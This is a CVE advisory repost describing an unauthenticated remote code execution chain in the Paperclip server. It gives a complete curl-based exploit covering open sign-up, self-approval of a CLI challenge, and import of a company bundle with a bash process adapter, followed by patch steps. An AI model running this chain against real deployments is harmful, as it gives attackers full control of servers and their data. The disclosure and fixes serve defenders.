Paperclip, Unauthenticated Remote Code Execution, CVE(N/A) (Critical)

Listen to this Post

The attack chains four independent flaws for zero‑to‑RCE. First, default config allows open sign‑up because PAPERCLIP_AUTH_DISABLE_SIGN_UP defaults to false (server/src/config.ts:169‑173) and email verification is hardcoded off (server/src/auth/better-auth.ts:89‑93). An attacker creates an account with a single POST to /api/auth/sign‑up/email, no invite or verification. Second, they sign in to capture a session cookie. Third, the CLI auth challenge endpoint /api/cli-auth/challenges has no actor check (server/src/routes/access.ts:1638‑1659); anyone can create a challenge. Then they self‑approve it using their session because the approval handler only checks for a board user, not that the approver differs from the creator (access.ts:1687‑1704). This yields a persistent boardApiToken. Fourth, the company import endpoint /api/companies/import lacks instance admin checks for new_company mode (companies.ts:170‑176), unlike the direct creation endpoint. The import accepts a .paperclip.yaml that defines a process adapter with command/args, calling spawn() without sandboxing (company‑portability.ts:3955‑3981). The attacker imports a bundle containing a malicious agent. Finally, they trigger the agent via /api/agents//wakeup, which only checks company access (agents.ts:2073‑2085), executing arbitrary OS commands as the server user.

dailycve form:

Platform: Paperclip server
Version: Default authenticated mode
Vulnerability: Unauthenticated RCE
Severity: Critical
date: 2026-04-11

Prediction: Estimated 2 weeks after disclosure

What Undercode Say:

Create account (open signup)
curl -s -X POST -H "Content-Type: application/json" \
-d '{"email":"[email protected]","password":"P@ssw0rd123","name":"attacker"}' \
http://<target>:3100/api/auth/sign-up/email
Sign in to get session cookie
curl -s -v -X POST -H "Content-Type: application/json" \
-d '{"email":"[email protected]","password":"P@ssw0rd123"}' \
http://<target>:3100/api/auth/sign-in/email
Create CLI challenge (no auth)
curl -s -X POST -H "Content-Type: application/json" \
-d '{"command":"test"}' \
http://<target>:3100/api/cli-auth/challenges
Approve challenge (with session)
curl -s -X POST -H "Cookie: <session-cookie>" \
-H "Content-Type: application/json" -H "Origin: http://<target>:3100" \
-d '{"token":"<token>"}' \
http://<target>:3100/api/cli-auth/challenges/<id>/approve
Import malicious company (with boardApiToken)
curl -s -X POST -H "Authorization: Bearer <board-api-key>" \
-H "Content-Type: application/json" -H "Origin: http://<target>:3100" \
-d '{"source":{"type":"inline","files":{"COMPANY.md":"\nname: attacker-corp\nslug: attacker-corp\n\nx","agents/pwn/AGENTS.md":"\nkind: agent\nname: pwn\nslug: pwn\nrole: engineer\n\nx",".paperclip.yaml":"agents:\n pwn:\n adapter:\n type: process\n config:\n command: bash\n args:\n - -c\n - id > /tmp/pwned.txt"}},"target":{"mode":"new_company","newCompanyName":"attacker-corp"},"include":{"company":true,"agents":true},"agents":"all"}' \
http://<target>:3100/api/companies/import
Trigger agent
curl -s -X POST -H "Authorization: Bearer <board-api-key>" \
-H "Content-Type: application/json" -H "Origin: http://<target>:3100" \
-d '{}' http://<target>:3100/api/agents/<agent-id>/wakeup

Exploit:

  1. Create account → 2. Sign in → 3. Create CLI challenge → 4. Self‑approve → 5. Import company with process adapter (bash command) → 6. Wake up agent → RCE as server OS user. Entire chain automated in <30 seconds.

    Protection from this CVE:

– Set PAPERCLIP_AUTH_DISABLE_SIGN_UP=true and document it.
– Change server/src/config.ts line 172: ?? false → ?? true (disable open registration by default).
– In server/src/routes/access.ts (~line 1700), reject CLI approval when approver == creator.
– Set requireEmailVerification: true in server/src/auth/better-auth.ts line 91.
– Add assertInstanceAdmin check to /api/companies/import for new_company mode (server/src/routes/companies.ts lines 161‑176).
– Validate .paperclip.yaml adapter config; never allow arbitrary command/args from untrusted bundles.

Impact:

Full unauthenticated remote code execution. Attacker gains filesystem read/write as server user, full database access, internal network pivot, and ability to disrupt all agents. Works against any default Paperclip deployment in authenticated mode.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top